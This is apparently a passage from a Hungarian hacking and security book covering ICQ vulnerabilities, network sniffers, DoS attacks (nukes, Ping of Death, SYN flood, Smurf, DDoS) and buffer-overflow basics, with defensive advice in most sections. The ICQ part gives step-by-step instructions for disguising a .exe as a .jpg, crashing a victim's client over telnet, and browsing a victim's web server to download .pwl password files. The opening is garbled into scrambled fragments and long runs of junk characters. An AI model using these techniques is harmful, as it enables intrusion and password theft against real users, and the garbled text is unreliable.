szolgáltat az áldozatról. Az ICQ-kliensen egy session közben megváltoztathatjuk a saját státuszunkat.praktikus és veszélyes Az „I seek you" egy kommunikációs eszköz. de az interneten egyre több program található.4. egyszerűen a Find User alatt megadjuk a nevét. a Mailbombák alatt. amely. A kliense a legkülönbözőbb platformokon megtalálható. hogy pillanatnyilag békén hagyják. Megjegyzés: A mail-támadásoktól eltekintve a számítógép Indítópult mappájába is előszeretettel másolnak ConCon-fájlt. mert a felhasználókat a UIN-on keresztül tudják más felhasználók megtalálni és azonosítani. és újra kelljen indítani. hogy a számítógép lefagyjon. A leggyakrabban használt Windows-kliens mellett Linux alatt is több kliens létezik. a választék az Online. hogy ez mit jelent). Az ICQ minden felhasználója egy saját számot kap. hogy csak a fontosabbakra szorítkozzunk. amelyek kikerülik ezeket a beállításokat. amelyek biztonsági kockázatként jelölik meg az ICQ-t. Az ICQ kiszolgálóelemei és egy Sub7 szerver -üzenet Védelem a ConCon ellen A http://www. Ezért ez sem jelent biztos védelmet. az e-mail címét vagy a UIN-t. 2000b ICQ-pager-értesítés egy Sub7 szerveren ICQ message-window 8. A kapcsolati listára minden felhasználót bejegyezhetünk. az IRC (InternetRelayChat) mellett az internet egyik legtöbbet használt chatrendszerévé fejlődött. és a kérdésre.

asp? A DADADADADADADADADADADADADADADADADADADADADADAD *-ADADADADADADADAD ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A *-DADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *»ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA *-DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *-ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADAD!Ü! pl A£)A£)A£)A£)A£)VA£)A£)A£)» *DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ^•ADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA *»DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ta»A£)A£)A£)A£)A£)A£)A£)A£) Védelem Ez ellen úgy lehet védekezni. def. A trükk a következő: a támadó kitömi a def.8. a fogadónál megjelenik egy popup ablak a fájl megnevezésével és más. itt nem lényeges információkkal. És itt is működik az ott már leírt trükk: tegyük fel.com/link. úgy ICQ-val is lehet fájlokat küldeni és fogadni. Egy ilyen támadást hajtottak végre például tesztcélokból egy Windows 98 és egy 2000 platform „ellen". például egy trójait vagy egy vírust. hogy az ICQ-kliensünket úgy állítjuk be. egy trójait vagy egy vírust stb. hogy azonnal eldobja az ismeretlen linkeket.exe Az exe fájlból semmit sem látni *-ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD h»ADADADADADADvADADADADADADADADADADADvADADADADA |*>DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D i*-ADADADADADADADAD *»D D D D D A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD ^A£)A£)A£)A£>A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A A A A A .2 Milyen biztonsági rések vannak? Korrupt linkek A különböző linkek megnyitása az ICQ-felhasználónál aktiválhat egy fájlt.jpg .4.jpg. A link így nézhet ki: http://www. Ha elküldi ezt a fájlt.exe fájl nevét egy sor üres karakterrel. pl. amelyeket nekünk küldenek. Fájlnevek kitömése az ICQ 99 alatt Ahogy mailben. Bizonyos parancsokkal összefüggésben azonban az egész merevlemezt is formattálhatják.yahoo. hogy a támadó küld a usernek egy fájlt.

a támadó már ott van a kívánt személy kapcsolati listáján. Ha a hackernek csak az áldozat IP-je van meg.Így a popup ablakban már nincs elég hely. Letölt magának egy ICQ-cracket az internetről. akkor a felhasználóból. hogy ő bármit is észrevenne ebből. amely közli. Az . Ezután meg kell szakítani a kapcsolatot a hálóval.172.. Ezért a legjobb védekezés az aktuális verzióra történő frissítés. Ezt a problémát elkerülendő. és megpróbál hozzáfűzni egy felhasználót. Most teljes nyugalomban megfigyelheti az áldozatát.82.172. hogy a rendszeres frissítés legalább rövid távon védelmet kínál. ha elfogadja és végrehajtja a fájlt. hogy felkerült egy listára. megpatcheli a crackkel. a parancssorba a következőt írja: Telnet 217. A felhasználó azt gondolja. Megnézni egy felhasználó fájljait Itt megintcsak előfeltétel. ahol a 217. inaktiválja az ICQ-t. a támadónak a következő lehetőségei vannak. linkkel lehet elérni. Vagy a támadó a partnerrel való beszélgetés közben egyszerűen beírja a parancssorba: netstat -n. Ez egy jó példa volt az ICQ kliens még fennálló bizonytalanságaira. Védekezés Az ICQ rendszeresen dolgozik chat-rendszere biztonságán. Védelem Ez a bug az ICQ 2000-ben már nincs benne. és a tulajdonképpeni végződés. amelyek azt mondják. amelyek lehetővé teszik a felhasználó felvételét a kapcsolati listára anélkül. Ha a támadó például egy trójait vagy egy vírust használt. Amint az ICQ a kérdésre pozitív választ ad. Egy ilyen jel a hackernek égből pottyant ajándék. Ha ez sikerült. könnyen áldozat lesz. a Find User-rel megkeresi azt az UIN-t. és most is megjegyzendő.40-et a megtalált IP-re cseréli. Mire minden hibaüzenetet tudomásul vettek. az . ha egy áldozatot akarnak felvenni a kontaktlistájukra. hogy az erről bármit is tudna. a Next-re kattint. amit gyakran ki is használ. Az ICQ hibajelzéseket ad. . hogy megtámadja ezeket a rendszereket. Ha ezt elintézte. és a hacker ismerje az IP-jét. hogy az áldozat ezt észrevenné.exe már nem látható. Rendesen ugyanis kap egy értesítést. Az interneten ehhez egész sor tool és crack van. egyetlen kattintással kijelöli a személy nevét. Itt az IP! Az ICQ lefagyasztása ICQ alatt megmutathatjuk más felhasználóknak. hogy az ICQ nem tud üzeneteket küldeni. Egy erre a célra szívesen használt eszköz a UIN-IP. akár meg is támadhatja. User hozzáfűzése engedély nélkül Az ICQ jóváhagyása időnként elég terhes a támadóknak. ráadásul anélkül. amelyet hozzá akar fűzni. anélkül.40:80. Ezáltal az áldozat ICQ-ja bezáródik. és egy idő múlva nem jelenik meg online-ként. hogy működtetünk-e webszervert a rendszerünkön. Az így jelzett webszerver ugyanis behatolási pontot nyújthat a támadónak.82.exe végződés helyett csak a -jpg-et látjuk. Ezután egyszerűen Quit-et ír a Telnet kliensbe. Ezt többnyire a fenti ikonra történő kattintással vagy a http://ipdesusers. hogy tényleg csak egy képet akarnak küldeni neki. hogy többet megtudjon a chat-partneréről. Ez az ICQ-path megadása után a kontaktlistára bejegyzett userek minden IP-jét visszaadja. vagy ha akarja. hogy a felhasználó egy webszervert telepített.

pwl.82. ahol a 217. amelyekre váltani kell. ne használjuk ezen a gépen az ICQ-t. így a jelszavak elérésére is van lehetőség.40 az áldozat IP címe. . Védekezés Ha webszervert kell futtatnunk. hogy a C:\-hez jusson.172.172.82. user. Most a támadó a számítógépére tudja menteni a kiválasztott fájlokat. A pontok a könyvtárakat jelölik. Természetesen ez csak egy példa. A legtöbb esetben azonban a Windows szabvány könyvtárstruktúrája fordul elő. mert a támadó nem fogja ismerni a pontos könyvtárstruktúrát.Most például beírhatná a böngészőjébe: http:// 217.40 /.html/.

3 9.Tartalom 9.2 9.9. fejezet .4 Mi az a sniffer? Hogyan működik egy sniffer? A sniffer veszélyei Mit lehet tenni a snifferek ellen? .1 9.

1 Mi az a sniffer? A sniffereknek különböző felhasználási területeik vannak. hogy csak a valóban releváns adatokkal foglalkozzon. betekintést kínálva annak. ethernet frame-nek is nevezett csomagokban kerül a hub-ra. Így a sniffer hozzákezdhet a tulajdonképpeni munkájához. a sniffer tulajdonságaitól függően. hol van a probléma a hálózaton belül. Ebből a fejezetből kiderül. Ez a mód bizonyos alkalmazásokon keresztül akkor is megengedi a csomagok felvételét és feldolgozását. az IPX. és onnan továbbítódik minden csatlakoztatott számítógépre. hogy a hálózat teljes adatforgalmát kiértékelje. és rendszerint egy fájlba írják az analizált adatokat. Hasonló rendszert találunk az internet-címzésnél is. Ez különbözteti meg a komputert a hálózat többi tagjától. hogy egész hálózati csomagokat „hallgassanak le". Ezek. 9. naplózzák az adatfolyamot. Az adatokat csak az a számítógép veszi fel. az Az Analyzer az egyik legismertebb sniffer . külön kis. Ha elküldünk egy üzenetet. Ezek közé tartoznak többek között: a TCP/IP (Ethernet/WWW). melyek a snifferek felhasználási területei. amely a hálózati interfészt úgynevezett promiscuous módra állítja át. A többi hálózati interfész ugyan fogadja az adatokat. Annak persze nem lenne értelme. lehetnek például jelszavak vagy felhasználói nevek.2 Hogyan működik egy sniffer? Egy számítógép valamennyi hálózati interfészének saját címe van a LAN-on. hogy magállapítsa. Az elfogott információkat a sniffer az output (kimeneti) fájlokba menü. aki installálta a sniffert. hogy mit is rejt ez a fogalom.9 Sniffer A snifferek jelentik az egyik legnagyobb veszélyt a hálózatokra. A snifferek a WWW/LAN/WAN egyes gépeire telepíthetők. ha azok nem az illető gépnek vannak címezve. Egyrészt a rendszergazdák pótolhatatlan segítőtársai a hálózati problémák vagy a potenciálisan veszélyeztetett területek felderítésében. amelyiknek címezve vannak. mert a legtöbb információ egyáltalán nem érdekes. de a nem neki szóló címzés miatt nem dolgozza fel azokat. A felhasznált sniffertől függően különböző protokollokat lehet lehallgatni. és milyen gondokat okozhatnak. A hálózatban gyakran használnak hub-ot az adatok szétosztására. Ezért a legtöbb sniffert úgy tervezték. Ha például gondok támadnak a hálózat egy részében a hiányos konfiguráció miatt. Ezen a ponton avatkozik be a sniffer. az Apple Talk. 9. akkor a rendszergazda bevethet egy sniffert. a Banyán VINES és az LCC. Másrészt a snifferek lehetőséget nyújtanak a támadóknak.

a Hewlett-Packard és az Intel. amelyekről a továbbiakban még írni fogunk. Ezeknél jelszavak kiosztásáról van szó.9. Az olyan biztonsági intézkedések. mint hogy nem tároljuk a jelszavakat a merevlemezen. mint amilyen az SSH vagy az SSL. A mail-postafiókok elleni támadásoknak is van egy biztos ellenszere. amelyik potenciális sniffer lehet. Ezek az eszközök azonban drágábbak az egyszerű hub-oknál. Felhasználói oldalról titkosító protokollokkal. amelynek a hálózati interfésze promiscuous módban van. amit a sniffelés után magával visz.4 Mit lehet tenni a snifferek ellen? A snifferek felfedezéséhez és eltávolításához jól kell ismerni a hálózati topológiát. amikor egy hálózat teljesítményének a gyenge pontjait keresik. ez a variáció. a megoldás kézenfekvőnek tűnik: csak olyan hálózati kártyát szabad használni. 9. . ráadásul csak a támadó gépén futnak. amelyek tesztelni tudják a hálózati reakcióidőket. vagyis passzívan működnek. A reakcióidő ellenőrzése Ha egy számítógépre. A csatlakozások ellenőrzése A rendszergazda is ellenőrizheti a LAN-ban található számítógépek hálózati kártyáit promiscuous módra vagy egyéb gyanús alkalmazásokra. ha van egy saját. Ilyen kártyákat (is) kínai pl. adatokat küldenek. mint a fentiek. Nagyobb hálózatoknál megfontolandók az olyan biztonsági mechanizmusok. Ezeket használják akkor is. a reakcióideje hosszabb lesz az általában szokásosnál. Ha egy hálózatban rendszeresen tesztelik az egyes csatlakoztatott számítógépek reakcióidejét. mert ezeket bármikor megtudhatja a sniffer. Vannak programok. Ha azonban a támadó egy. hogy a fogadott adatokat minden vele kapcsolatban álló számítógépnek elküldi. amelyek csak egyszer érvényesek. az IBM. valóban csak a célgépre továbbítják az adatokat. Intézkedés Adatelosztás Leírás Egy sniffer támadási pontját tulajdonképpen a hubnak az a tulajdonsága nyitja meg. Ipv6 Hamarosan megjelenik a TCP/IP új verziója. Titkosítással biztonságossá lehet tenni az adatátvitelt. Mivel egy sniffer csak úgy tud működni. A döntően hálózati felhasználás azonban alapvetően nagyobb ráfordítást igénylő intézkedéseket tesz szükségessé. Ez a protokoll Ipsec-et is tartalmaz. Így azután nem is szükséges közvetlenül beavatkozni egy meghatározott felhasználó rendszerébe ahhoz. amely szintén kódolva továbbítja az adatokat. amely nem engedélyezi ezt a módot. mert a teljes hálózati adatforgalmat felügyelhetik. éppúgy. azonban ahogy ez a protokoll majd szabvánnyá válik a hálón. akkor jól be lehet határolni azt a számítógépet. Ha biztosra akarunk menni. védhetjük az adatainkat a siffherek ellen. a 3Com. hogy kikémleljék mail-postafiókja vagy online banki jelszavát. a normál hubokkal ellentétben. állandó jelszavuk. hogy csak a címzett gép tudja dekódolni. az S/POP nevű eljárás. ha a hálózati kártya promiscuous módban van. a snifferek problémája is meg fog szűnni (egy időre). amely Ipv6 vagy IPng néven ismert. Ezért a normál hálózati felhasználó aligha tudja felfedezni a sniffert a LAN-on. kevéssé hatékony. mint az S/Key vagy a SecurelD-Token. a hub-ok helyett switcheket vagy auto-switching hub-okat is használhatunk. és a felhasználók sem veszik szívesen. amelyek. a hálózatba integrált notebookot használ. A leleplezéshez csak a rendszergazdáknak vannak különböző programjaik. mert jobban szeretik.3 A sniffer veszélyei A snifferek nagy veszélyt jelentenek a hálózati struktúrára. Titkosítás Az alkalmazásokban használt kódolás minden bizonnyal a legfontosabb védelem a sniffer-támadások ellen. Az alábbi táblázatból részletesen megismerhetők a védelmi mechanizmusok. mégpedig úgy. A snifferek a normál felhasználó szempontjából semmilyen nyomot nem hagynak maguk után. Intézkedés Hálózati kártya Leírás Egyszerűbb és olcsóbb megoldás megfelelő hálózati kártyával felszerelni a LAN-ra csatlakoztatott számítógépeket. amelynél az adatok hálózati szinten lesznek kódolva. tulajdonképpen semmit sem érnek. Sajnos ez az eljárás elég költséges. Részletesen most nem foglalkozunk az Ipv6-tal.

csupán mail-szolgáltatást kínáló szolgáltató csak üzletileg kínálja az SSL használatát. Az ilyen programokkal szemben azonban mindig egy kicsit szkeptikusnak kell maradni. A szokásos Telnet-kliensek helyett SSH-klienset (Secured Shell) is lehet használni. Védelmi Intézkedések a snifferek ellen Végeredményben azonban mindig lesznek programok. Az e-mail-küldésnél mindenesetre problematikus. amelyen éppen lokálisan rajta vagyunk. amelyek leleplezik. A PGP-vel vagy hasonló programokkal kódolt fájlok/mailek biztonságában is csak akkor lehet bízni. amelyek azt a számítógépet ellenőrzik. mégsem kínálnak lehetőséget az adatok kódolására. amelyek ugyan hálózatról működnek. hogy védetten lehessen bejelentkezni a Telnetről. amely mint snifftest. mivel ott az adatok eleve kódolva továbbítódnak.c is ismert. de nincs nagy hasznuk.Intézkedés Leírás A HTTP-átvitelek titkosítására szolgál az interneten az SSL (Secure Socket Layer). SSL SSH Mivel a Telnet kódolatlanul továbbítja az adatokat. elérhetik ugyan a céljukat. ha egy másik számítógép éppen sniffel. Vannak azonban olyan programok is. akkor a megnyitáshoz szükséges jelszó megint csak a hálózaton megy keresztül. Igazán csak az IPv6 használatával lehet majd biztonságos adatátvitellel számolni. amely csak biztonságosan kódolva továbbítja az adatokat. mert többnyire csak bizonyos hálózati kártyák búgjait ellenőrzik. vagy olyan programokat használnak. Anti-sniffer' A hálón a legkülönbözőbb programokat kínálják a snifferek felkutatásához. így a sniffer nem tud mit kezdeni velük. Tehát figyelni kell arra. hogy milyen szolgáltatásokat veszünk igénybe a kevéssé biztonságos hálózatokon keresztül. amelyek felhívják a figyelmet az ilyen támadásokra. Ilyen program pl. Mivel a legtöbb felhasználó nem szívesen használ manuális kódolást. Unixhoz/Linuxhoz a Beavis and Butthead. új lehetőséget kellett fejleszteni. például a jelszavakat és a parancsokat is. a kódolási folyamatnak automatikusnak is kellene lennie. Ha azonban a PGP-vel kódolt maileket a mail-szerveren nyitják meg (ami biztosan gyakran megtörténik). így ezt is minden sniffer foghatja. ha a fájlok megnyitása a saját gépen történik. Már böngészőket is lehet kapni megfelelő erős kódolással. hogy sok. . Az olyan programok.

fejezet.9 Ping-Flodding Smurf DDoS .2 10.Distributed Denial of Service támadások Védelem a DoS-támadások ellen .8 10.a „nuken" Large Packet-támadások avagy a Ping of Death Land támadások 10.6 10.10.4 Az IP-spoofing mint előfeltétel Out-of-Band csomagok .7 10.1 10.Tartalom 10.3 10.5 TCP-Syn-Flooding 10.

ez csak egy behatárolt megoldás. hogy a támadó nyomait eltüntessék. hogy a rendszert lerohanja. Ezért az Out of Band csomagokat az olyan rendszerek megtámadásához használják. ha a támadó nem talál más utat. Az OOB a TCP/IP egyik tulajdonsága. Így a támadót. Ha a 135. Az egyik legismertebb támadást 2000 februárjában. hogy a rendszert egy időre lebénítsa. Az Out of Band csomagok felhasználását a DoS-támadásokhoz a Microsoft egy hibás NetBEUI implementációja tette lehetővé. 10. a rendszer összeomlik. mind a 2000-t ellenállóvá tette e támadások ellen. A Microsoft felismerte ezt a hibát. amelynél a csomag feladójának a címét megváltoztatják. Sajnos. a CNN és néhány más nagyobb portál ellen a hálón. és a 139. Megengedi az adatok átvitelét a normál sorrenden kívül. aki két napig bombázta a Yahoo-t és társait. és ezzel a protokollal továbbítódik. hogy az egy ideig nem is tudja újrakezdeni a működését.(Denial of Service -. A DoS-támadások az operációs rendszerek. amelynél hamis IP-számot használnak.10 A Denial of Service támadás A DoS. mint a szervereket.szolgáltatás megtagadó) támadások az internet egyik legnagyobb veszélyforrásává váltak az idők során. Az eredmény azonban mindig ugyanaz: a megtámadott számítógép felmondja a szolgálatot. két napon belül indították a Yahoo. portok egy számukra nem értelmezhető karaktersort kapnak. DoS-támadásokat többnyire akkor hajtanak végre. Kedvelt célok azok a felhasználók is. ami azt jelenti. hogy ezeknek a támadásoknak különböző fajtái vannak.2 Out-of-Band csomagok . Az IP-spoofing. mint például a WinGates. programok és protokollok hibáit használják ki. A DoS-támadások ugyanúgy érintik az internet-felhasználókat. vagy ha éppen az a célja. amely lehetetlenné teszi hamisított IP-csomagok internetre küldését a csatlakoztatott hálózatüzemeltetőknél. és mind a Windows 98/98SE/ME-t. Egy ilyen támadásnál számítógépeket rohannak le az interneten. hogy hamis identitást színleljenek a megtámadott IT-rendszer felé. . így a támadónak még alaposabb technikai ismeretekkel sem kell rendelkeznie a használatukhoz. és . A DoS-támadások célzott végrehajtásának másik oka lehet például. mert csak a szervezethez kapcsolódó rendszerekből érkező támadásokat akadályozza meg. hogy minden Kettő a legismertebb nukerek közül 10. A WinGatesszerver feltételezi. és úgy lefagyasztják. Vagy már a támadást is ez teszi lehetővé. és ezeken egyenként körülbelül 40000 karaktert küldenek. például a webszervereket.a „nuken'' A legismertebb DoS-támadások közé tartozik a miken vagy az Out-ofBand (OOB) csomagok küldése. amelyeknek többnyire jól kezelhető. 1998-ban létrejött egy védelmi szervezet. akik game-szervereken vagy IRC-szervereken találhatók. A WinGates 4. grafikus felületük van. csak a hencegése alapján kapták el egy idevágó chatszobában.többek között . és megakadályozzák az azonosítását.01-t például így lehetne megtámadni: 100 kapcsolatot állítanak elő a WinGates-hez. az eBay. sok DoS-támadás alapját képzi.1 Az IP-spoofing mint előfeltétel Az IP-spoofing egy támadási eljárás. A rendszerek kiesése következtében fellépő kár mintegy 100 millió dollárra rúgott.Telnet session-ökhöz használják. vagy arra szolgál. A különböző támadásokhoz egész sor eszköz áll a támadók rendelkezésére. hogy egy rendszert újraindításra kényszerítsenek valamilyen változtatás érvénybe léptetése érdekében (jelszó: trójai).

egy ilyen támadás lefolyásának a sémája. Ha most a rendszergazda megpróbál belépni. hogy milyen csomagról van szó. Ez a túlméretezett csomag túlcsordulást (Buffer Overflow-t) okoz a rendszerben. az rövid időn belül felmondja a szolgálatot. Minden csomagtöredék tartalmaz egy offset értéket és egy azonosítási számot. sikertelen lesz. hogy az utolsó töredéknek olyan offset értéket lehet adni.a feladó címe megegyezik a címzettel. amelyekkel bejelenti a kapcsolatot. 10. • A host válaszol a SYN l-re. hogy a hostot rettenetes mennyiségű további SYNcsomaggal bombázza. íme.3 Large Packet-támadások avagy a Ping of Death A Denial of Service támadások különösen végzetes fajtája a Ping of Death. Ez a kísérlet azonban. akkor speciális IP-csomagokat küld. • És így tovább. és előállítani a kapcsolatot. és várja a választ az ACK l-re és 2-re.kapcsolat fennmarad. és várja a választ. Mindez azért történik. és megbénítja az áldozat rendszerét. • A támadó elküldi a SYN 3-at. • A host válaszol a SYN 2-re. amíg el nem használja a szerver pufferét. • A támadó elküldi a SYN l-et. hogy egy rendszert hatalmas adatfolyammal terheljenek. a protokoll-implementáció említett hibáját kihasználva. A szerver minden SYN-csomagra ACK-csomaggal válaszol. . kész vagyok" ACKválaszcsomaggal nyugtázni. hamisított feladóval küldi a SYN-csomagokat egy szerverre . vagyis „Beszélni akarok veled" üzenetet küld a hostra. A címzett reagál erre. Ezek a tények teszik lehetővé. ha két számítógép között TCP/IP-n keresztül jön létre kapcsolat. Ha ezt a várakozási időt a támadó arra használja. Ezek ellen a támadások ellen is régóta létezik már bugfix. Ezt a folyamatot Three Way Handshake-nek is nevezik. out of buffer hibaüzenetet kap. Az Internet Protokoll headerrel (fejléccel) együtt pontosan 65535 bájtot csomagol egyetlen csomagba. vagyis feldarabolja. a nemlétező feladó miatt. Ez a következőképpen történik. és az adattömeg addig halmozódik. elküldi az ACK 2-ét. A Ping of Death támadások a következő protokolloknál lehetségesek: ICMP. A TCP-Syn-Flodding támadásnál a támadó először hamis feladóval nagy számú SYN-csomagot. ahol a sok IP-stack egyfajta túlcsordulást idéz elő. és a gép összeomlik. 10. elküldi az ACK l-et. 10. de ezt a csomagot most egy saját nyitott portjára fogja küldeni. Ez utóbbinak semmi köze a tulajdonképpeni ping-parancshoz. és a számítógép bizonyos várakozási idő után eredménytelennek nyilvánítja a kísérletet. UDP és TCP. majd összeomlást idézzenek elő. amely a teljes csomagot nagyobbnak mutatja 65535 bájtnál. hogy egyszerűbb legyen az átvitelük. Az első csomagban még egy TCP-header is található. A támadásnak ezt a fajtáját az elkészült bugfixekkel ma már a legtöbb operációs rendszer visszaveri. amelyről ebben a fejezetben még szó lesz. Ezeket SYNcsomagoknak is nevezik. a résztvevők először egy Three Way Handshake-et váltanak. A host ezt megpróbálja egy „OK.5 TCP-Syn-Flooding Mint ahogy a Land támadásoknál már leírtuk. az Ethernet-csomagok pedig csak 1500 bájtosak. amely meghatározza. Aki viszont Land támadást hajt végre. valamint a portszám. és aztán újra reassemblálja (összerakja) őket. Az ennél nagyobb csomagokat fragmentálja. hogy az adatok át tudjanak futni a különböző hálózati rétegeken. • A támadó elküldi a SYN 2-t. és válaszul ACK-csomagot (ACK = Acknowledgement = a fogadás nyugtázása) küld.4 Land támadások A Land támadások a TCP-implementáció egy hibáját használják ki ahhoz. Röviddel a halálos lökés előtt Mikor egy számítógép kapcsolatot próbál felépíteni egy másikkal.

Az érintett rendszer a bemenő adatok terhe alatt szó szerint összeomlik.7 Smurf A Smurf-nél a támadó egy hálózat broadcast címére küld egy pinget manipulált feladócímmel. az eBay és társai ellen. a broadcast cím mögötti számítógép válaszol. 10. A megváltoztatott feladócímek.6 Ping-Flodding A pingeket az interneten és a hálózatokban használják. Megpingelünk egy hostot.8 DDoSDistributed Denial of Service támadások A DDoS-nál (DDoS-támadás = elosztott szolgáltatás megtagadó támadás) még a tulajdonképpeni roham előtt szerez a támadó elérést néhány másik rendszerre. Az előkészítés abból áll.9 Védelem a DoS-támadások ellen A normál felhasználó számítógépe nemcsak áldozata lehet a DoStámadásoknak. Ezt használják ki a támadók a Ping-Floddingnál. hogy távirányítani tudja a szá- . hogy a támadó a lehető legtöbb olyan rendszert megtalálja. érdemes előfizetni a Computer Emergency Response Teams (CERT) levelezőlistájára http://www. Legyen az szerver vagy normál felhasználó . amelyeken biztosítani tudja magának a rendszergazdai jogokat. és beszerzési forrást kínálnak a megfelelő frissítésekhez. hogy fel tudja tölteni a scripteket a támadáshoz.cert.10. Az ilyen támadások után többnyire teljesen le kell venni a szervert a hálózatról. Ezek azonnal tájékoztatnak az újabb gyenge pontok felfedezéséről. hogy sor kerüljön a további feldolgozásukra. amitől az összeomlik. fejezetben írtunk. Ráadásul a ping-flodding támadásokat az áldozat csak akkor fogja észrevenni. hogy mindig legyen aktuális vírusvizsgáló a gépünkön. Előkészület egy DDoS támadásra 10. az áldozatéi. amelyre minden. Ez bizony rengeteg választ jelent.vagy ISDN-csatlakozás) is térdre tudnak kényszeríteni nagy átviteli sávszélességgel rendelkező áldozatokat. azt eredményezik. visszhangszerű választ ad. 10. ha a szolgáltatója a forgalom szerint számol el. és ha elérhető. A DoS-támadások ellen a jól konfigurált tűzfalak is védelmet kínálnak. illetve a programokat többnyire trójaiak segítségével telepítik a rendszerekre. hogy minden választ az áldozat kap meg. (A trójaikról a 4.org és a gyártóéra. hanem arra is használhatják a támadók. a host pedig valamennyire megpróbál válaszolni. A scripteket. A gyártók előbb vagy utóbb felfedezik az operációs rendszerekben és a szerverszoftverekben a biztonsági szempontból gyenge pontokat. hogy megállapítsák egy host elérhetőségét. hogy az áldozatát nagy mennyiségű adatcsomaggal szembesítse. és ezeket arra használja. a host nem tud több kérdésre válaszolni. és rövid idő múlva frissítést kínálnak hozzájuk. A 2000. és meg lehet akadályozni. Pingekkel bombázzák a célt. Hogy a gyenge pontok dolgában mindig képben legyünk.) Ha elegendő kiszolgálót talált. hogy rajta keresztül hajtsák végre más rendszerek ellen a támadásokat. s az áldozatot csomagok áradatával önti el. ezért is elengedhetetlen. mítógépeket. az áldozat több mint egymillió választ kap. Ezeken a rendszereken trójaiakat helyez el. ezeket feltölti scriptekkel vagy programokkal. Ehhez a támadó hibás rendszereket keres szkenneléssel (közelebbit lásd a szkennelésről szóló fejezetben). Ha az ismétlés elég gyakori. februári híres DDoS támadások óta állandóan növekszik az ilyen jellegű támadásokra alkalmas programok száma a Yahoo. Smurffel akár nagyon kis átviteli kapacitással rendelkező támadók (modem.minden esetben érvényes. Ha ilyen módon másodpercenként 1000 pinget küldenek 1000 különböző számítógépre. A segítségükkel el lehet kapni a módosított csomagokat. hogy mindig tájékozódni kell a mindenkori operációs rendszer biztonságot érintő frissítéseiről.

2.1.2.1 Az operációs rendszer memóriakezelése 11.4 11.Tartalom 11.2 Adatok 11.1 Szöveg 11.2 A Buffer-Overflow-támadások 11.2 Hogyan működik? 11.1.1 Hogyan lehet ezt kihasználni? 11.2 A Buffer-Overflow-k és a tűzfalak .5.3 Minek kell a Shellcode változónál állnia? 11.5.1.1 Összefüggés a CPU és a Buffer-Overflow között.3 A stack (magyarul: halom/rakás) 11.11.2. fejezet . 11.5 Áldozat a Buffer-Overflow-kért Honnan lehet felismerni a Buffer-Overflow-t? Milyen védelmi mechanizmusok vannak? 11.3 11.

hogy eldobná a program. Más elérések „segmentation fault" hibával végződnek. vagyis ezeken nem lehet változtatni.2 Adatok Az adatrész inicializált és inicializálatlan adatokra osztható. Alsó memória SZÖVEG inicializált adatok inicializálatlan adatok Felső memória STACK Memóriafelépítés 11. A stack LIFO-elven (last in. first out) működik.3 A stack (magyarul: halom/rakás) A stacket elképzelhetjük úgy. amelyek . mint egymásra halmozott lapokat. amelyekre egy program futása ugrik. Azokat az adatokat. 11.1. A címek. ahelyett. hogy kidöntsenek egy weboldalt. De arra is lehet használni ezeket a támadásokat. 1996-ban az AlephOne Bugtraq levelezőkör moderátora cikket közölt Smashing the Stack for Fun and Profit címen. A stack szerkesztésének legfontosabb assembler parancsai a PUSH (adatokat tesz a stackhez) és a POP (olvassa a stack legfelső elemét).1 Szöveg Egy adott programhoz rendelt memóriatartomány több részre oszlik. amelyben a normál változók adatai találhatók. hogy az elemek.1. hogy megöröklik a megszakított szolgáltatás jogait. A Buffer-Overflow-rohamokat arra használják. Ezeket a karakterláncokat az operációs rendszer „readonly"-ként kezeli.static"-ként deklarálódnak. de távoli eléréssel is. amelyekkel az egész számítógép felett ellenőrzést szereznek. elsőként kerülnek ki.2 A Buffer-Overflow-támadások A Buffer-Owerflow tulajdonképpen annyit jelent. 11. például a Súgó szövege. hogyan vezethet a rossz programozás biztonsági résekhez. vagyis Buffer-Overflow támadásokhoz lehet felhasználni. Ebben leírta.. A stack az a memóriaterület. hogy támadásokat hajtsanak végre szerverek ellen. Egyes esetekben ez akár a boot-jogokig terjedhet. ellentétben a FIFO-elvvel (first in. Ennek a hozzárendelt területnek a méretét a „brk" paranccsal lehet megkapni. amelyek már nem férnek be a pufferba. Ezt úgy csinálják. hogy később speciális jogokat szerezzenek a szerverhez. ha egy eljárás vagy függvény lefutott. Ez azt jelenti. megpróbálja beleírni. szintén a stackben tárolódnak (például a szegmensek kezdő címei.) Erről azonban később. first out).1. számú és legalul az 1. számú lap. Így végre lehet hajtani fizikai hozzáféréssel a szerverhez. A legérdekesebb ezekben a támadásokban a Buffer-Overflow-rohamok függetlensége a támadó székhelyétől. amelyeket aztán puffer-túlcsordulásos. amelyet egy program kiad. mint amilyennel például a pipe-nál találkozhatunk. Az alsó memóriában illetve a szövegrészben csak karakterláncok vannak tárolva. Ezzel egymásra épülő célokat lehet elérni: pl. amelyek legfelül helyezkednek el (tehát utoljára kerültek oda). Ennek következtében az . ahol legfelül van a 10.1 Az operációs rendszer memóriakezelése Az alábbi vázlat egy operációs rendszer memóriafelépítését szemlélteti. mint amennyit az fel tud dolgozni. 11. egy bizonyos szolgáltatást összeomlásra kényszeríteni. hogy többet írnak a pufferbe.11 Buffer-Overflow 11.

